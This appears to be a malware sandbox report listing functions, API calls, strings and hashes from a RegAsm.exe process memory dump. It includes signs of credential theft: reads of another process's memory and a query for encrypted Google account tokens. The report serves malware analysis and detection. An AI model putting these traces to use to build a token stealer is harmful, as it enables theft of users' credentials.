Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: e323b6b76754fb976900a6a1d12b861c608caf8a2682c9435e753106765a24d1
Instruction ID: 1e929aff77d489107c4afe289ec3c1b852bb6c303d4d8f881fcc182f0245937f
Opcode Fuzzy Hash: e323b6b76754fb976900a6a1d12b861c608caf8a2682c9435e753106765a24d1
Instruction Fuzzy Hash: 684149747002048FDF24DFA5C898BAE77F5BF89318F144068E50A9B791EB30AC05CB65

Function 6C04CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C0131A7), ref: 6C04CDDD

Strings

<jemalloc>, xrefs: 6C04CF9F, 6C04CFB3
: (malloc) Error in VirtualFree(), xrefs: 6C04CFA4, 6C04CFB8

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 8141073537315845498e97c03f3bac5de26e8676482b32891c8ab97eeef3f604
Instruction ID: 6b21b83d340f6677e80065452456eb049d2f5aca5cf11ffc37ef2ac1ce15d1ae
Opcode Fuzzy Hash: 8141073537315845498e97c03f3bac5de26e8676482b32891c8ab97eeef3f604
Instruction Fuzzy Hash: FF31C871740225EBEF10AFA68C55F6F7BF5BB41B58F309024F615ABA80DB70D9048791

Function 6C01ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C01F100: LoadLibraryW.KERNEL32(shell32,?,6C08D020), ref: 6C01F122
Part of subcall function 6C01F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C01F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C01ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C01EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C01EDCC
CreateFileW.KERNEL32 ref: 6C01EE08
free.MOZGLUE(00000000), ref: 6C01EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C01EE32

Part of subcall function 6C01EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C01EBB5
Part of subcall function 6C01EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C04D7F3), ref: 6C01EBC3
Part of subcall function 6C01EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C04D7F3), ref: 6C01EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C01EDC1

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 052ade9ec8262c08e9c14951f401662649ff1e87dce0d15e43a70be63b4f54b4
Instruction ID: 264b7ed27fcf32ab4b8c7bcfe5e45f39bb104941aa0b864560daec88ef5e2082
Opcode Fuzzy Hash: 052ade9ec8262c08e9c14951f401662649ff1e87dce0d15e43a70be63b4f54b4
Instruction Fuzzy Hash: E451A271D093048BDB00DFA8C8447AEF7F1AF59318F44852DE86567F80EB356988C7A2

Function 0040F915 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040F934
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000), ref: 0040F95E
ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0040F9AB
ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040FA04
VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0040FA5C
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040FA6D

Strings

@, xrefs: 0040F977

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtual
String ID: @
API String ID: 3835927879-2766056989
Opcode ID: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction ID: 782d1e78530d26aac93c20cf39dad9713f636d1ba6f6d7f846141922d26d4ee5
Opcode Fuzzy Hash: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction Fuzzy Hash: B8419D32A00209BBDF209FA5DC49FDF7B76EF44760F14803AFA04A6690D7788A55DB94

Function 6C08A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C08A565

Part of subcall function 6C08A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C08A4BE
Part of subcall function 6C08A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C08A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C08A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C08A6B6

Strings

z, xrefs: 6C08A6AE
0, xrefs: 6C08A5FB

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 4f08669747cc93ab9226e40abd09d66dde943825fd532d04dfaab0a04bcdfda3
Instruction ID: 8a22f7d222455c7280bea5528a415a1ffa8583923aeaf0b0b2b33b63476a94a8
Opcode Fuzzy Hash: 4f08669747cc93ab9226e40abd09d66dde943825fd532d04dfaab0a04bcdfda3
Instruction Fuzzy Hash: D14139719097459FC741DF28C080A8FBBE5BF89354F509A2EF49987794EB30E549CB82

Function 6C0178C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6C09008B), ref: 6C017B89
free.MOZGLUE(?,6C09008B), ref: 6C017BAC

Part of subcall function 6C0178C0: free.MOZGLUE(?,6C09008B), ref: 6C017BCF

free.MOZGLUE(?,6C09008B), ref: 6C017BF2

Part of subcall function 6C035E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C035EDB
Part of subcall function 6C035E90: memset.VCRUNTIME140(6C077765,000000E5,55CCCCCC), ref: 6C035F27
Part of subcall function 6C035E90: LeaveCriticalSection.KERNEL32(?), ref: 6C035FB2

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: e77e06eb9861f91e956aa0401f3fbca2a6f1caede7aedc7294ee11bb6e03e2c5
Instruction ID: 4cdd49ba9ef1843225b5e5393fb0bfe6626479fad31c0d2600e13d4ee6608a2d
Opcode Fuzzy Hash: e77e06eb9861f91e956aa0401f3fbca2a6f1caede7aedc7294ee11bb6e03e2c5
Instruction Fuzzy Hash: 55C19531E091288BEB248BACCC90B9DF7F2AF41314F5542A9D51AA7FC1C731AE858F51

Function 6C059420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C04AB89: EnterCriticalSection.KERNEL32(6C09E370,?,?,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284), ref: 6C04AB94
Part of subcall function 6C04AB89: LeaveCriticalSection.KERNEL32(6C09E370,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C04ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C024A68), ref: 6C05945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C059470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C059482
__Init_thread_footer.LIBCMT ref: 6C05949F

Strings

MOZ_BASE_PROFILER_LOGGING, xrefs: 6C05947D
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C05946B
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C059459

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 011fbe0f309109fb47a8f4866b6177f5725c918d2ce697f0b8f7ec5f12826916
Instruction ID: eee429482f1b36581a57526d442db9c008eb5c24a9da1a3074c37b26c68b54c2
Opcode Fuzzy Hash: 011fbe0f309109fb47a8f4866b6177f5725c918d2ce697f0b8f7ec5f12826916
Instruction Fuzzy Hash: 1801B5B0A0010187DA009F5CD915B8A33FEBB45328F145536FD1A86A41DA31ED768E97

Function 00409A0E Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 223stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409BB2

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,AccountId), ref: 00409BCF
lstrlenA.KERNEL32(?), ref: 00409C7E
lstrlenA.KERNEL32(?), ref: 00409C99

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 00409B1F
GoogleAccounts, xrefs: 00409A37
GoogleAccounts, xrefs: 00409A8E
AccountId, xrefs: 00409BC9

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$lstrcat$AllocLocal
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 3306365304-1713091031
Opcode ID: 23a8635a48a7421f52fb52e76b1e4f954d6a09d0e6bce8243b1f57598da2cf87
Instruction ID: bcd8a3c27cc20b2b0202687c0b5b9a5b34e989406908c304105e5c1fc2b99bb7
Opcode Fuzzy Hash: 23a8635a48a7421f52fb52e76b1e4f954d6a09d0e6bce8243b1f57598da2cf87
Instruction Fuzzy Hash: 45815171E40109ABCF01FFA5DE469DD77B5AF04309F511026F900B71E2DBB8AE898B99

Function 6C060F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C060F6B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C060F88
GetCurrentThreadId.KERNEL32 ref: 6C060FF7
InitializeConditionVariable.KERNEL32(?), ref: 6C061067
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C0610A7
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C06114B

Part of subcall function 6C058AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C071563), ref: 6C058BD5

free.MOZGLUE(?), ref: 6C061174
free.MOZGLUE(?), ref: 6C061186

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: f979c419b4834e5f565ca1e468d2f45c6a8eb85919840ff66901740fda047fb0
Instruction ID: 760bb87b9f8545299756137bb569462e3b9511aaa326ba7776bd2361de73b549
Opcode Fuzzy Hash: f979c419b4834e5f565ca1e468d2f45c6a8eb85919840ff66901740fda047fb0
Instruction Fuzzy Hash: B561B075A083409BDB10CF26C880B9AB7F6BFC5308F14991DE89947B11EB71E949CB82

Function 6C01B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C01B61E,?,?,?,?,?,00000000), ref: 6C01B6AC

Part of subcall function 6C02CA10: malloc.MOZGLUE(?), ref: 6C02CA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C01B61E,?,?,?,?,?,00000000), ref: 6C01B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C01B61E,?,?,?,?,?,00000000), ref: 6C01B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C01B61E,?,?,?,?,?,00000000), ref: 6C01B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C01B61E,?,?,?,?,?,00000000), ref: 6C01B71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C01B61E), ref: 6C01B73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C01B61E,?,?,?,?,?,00000000), ref: 6C01B760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C01B61E,?,?,?,?,?,00000000), ref: 6C01B79A

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: f85e278c0552bd4c041fa3ae02e4f79623efe158ae8f1061bb6207278c13ae30
Instruction ID: 4d92c4cb4e94aa9cd71bd91d55bbd121cefce3783043a47f559c2e410483999e
Opcode Fuzzy Hash: f85e278c0552bd4c041fa3ae02e4f79623efe158ae8f1061bb6207278c13ae30
Instruction Fuzzy Hash: 0B41B2B2D041159FCB14DFA8DC807AEF7F9BB54324F250629E825E7B90E731AA0487D1

Function 6C01EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(6C095104), ref: 6C01EFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C01EFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C01EFEC
free.MOZGLUE(?), ref: 6C01F00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C01F02E
memcpy.VCRUNTIME140(00000000,?), ref: 6C01F041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C01F065
moz_xmalloc.MOZGLUE ref: 6C01F072

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: 75c20573b428215def1d8eafc14b541f724802f05285af97ebe23d8a2d8012ad
Instruction ID: 5f7a5b2caf29511baa782e8cf0058a39120aff41c2e1b15096690f59e8d6a268
Opcode Fuzzy Hash: 75c20573b428215def1d8eafc14b541f724802f05285af97ebe23d8a2d8012ad
Instruction Fuzzy Hash: EE410BB1A041159FCB08CFA8D880AAE73E9BF94314B24422CE915D7B94EB71E915C7E1

Function 6C08B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C08B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C08B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C08B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C08B5F4
__Init_thread_footer.LIBCMT ref: 6C08B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C08B61F
std::_Facet_Register.LIBCPMT ref: 6C08B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C08B655

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 68355dc2d264a2a5ab2cc4d612e52f00da27e6d37edb3508daa6b1bf0ca1ac8c
Instruction ID: 89b3728979bbbaba5af6a182920c721201694472d5f1d7c2e2805a9c55d2c018
Opcode Fuzzy Hash: 68355dc2d264a2a5ab2cc4d612e52f00da27e6d37edb3508daa6b1bf0ca1ac8c
Instruction Fuzzy Hash: 6C31A471B01104CBCF10DF69C858BAEB7FAFB86324B144529E91697790DF30A906CF91

Function 6C056590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C04FA80: GetCurrentThreadId.KERNEL32 ref: 6C04FA8D
Part of subcall function 6C04FA80: AcquireSRWLockExclusive.KERNEL32(6C09F448), ref: 6C04FA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C056727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C0567C8

Part of subcall function 6C064290: memcpy.VCRUNTIME140(?,?,6C072003,6C070AD9,?,6C070AD9,00000000,?,6C070AD9,?,00000004,?,6C071A62,?,6C072003,?), ref: 6C0642C4

Strings

data, xrefs: 6C056593
vl, xrefs: 6C05696C

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$vl
API String ID: 511789754-3343073033
Opcode ID: ea102f81b376724527a49116662cc9165a3eaa7dcad141a182165f729c3c7ee3
Instruction ID: 6234ddf1d889f3d3500e77dcfef3a9e5685f126e54673896ed7343387d3e8c45
Opcode Fuzzy Hash: ea102f81b376724527a49116662cc9165a3eaa7dcad141a182165f729c3c7ee3
Instruction Fuzzy Hash: 54D1E175A093408FDB24DF25C850B9FB7E5AFC5308F50892DE589C7B91EB30A919CB92

Function 6C029830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6C077ABE), ref: 6C02985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C077ABE), ref: 6C0298A8
moz_xmalloc.MOZGLUE(00000020), ref: 6C029909
memcpy.VCRUNTIME140(00000023,?,?), ref: 6C029918
free.MOZGLUE(?), ref: 6C029975

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
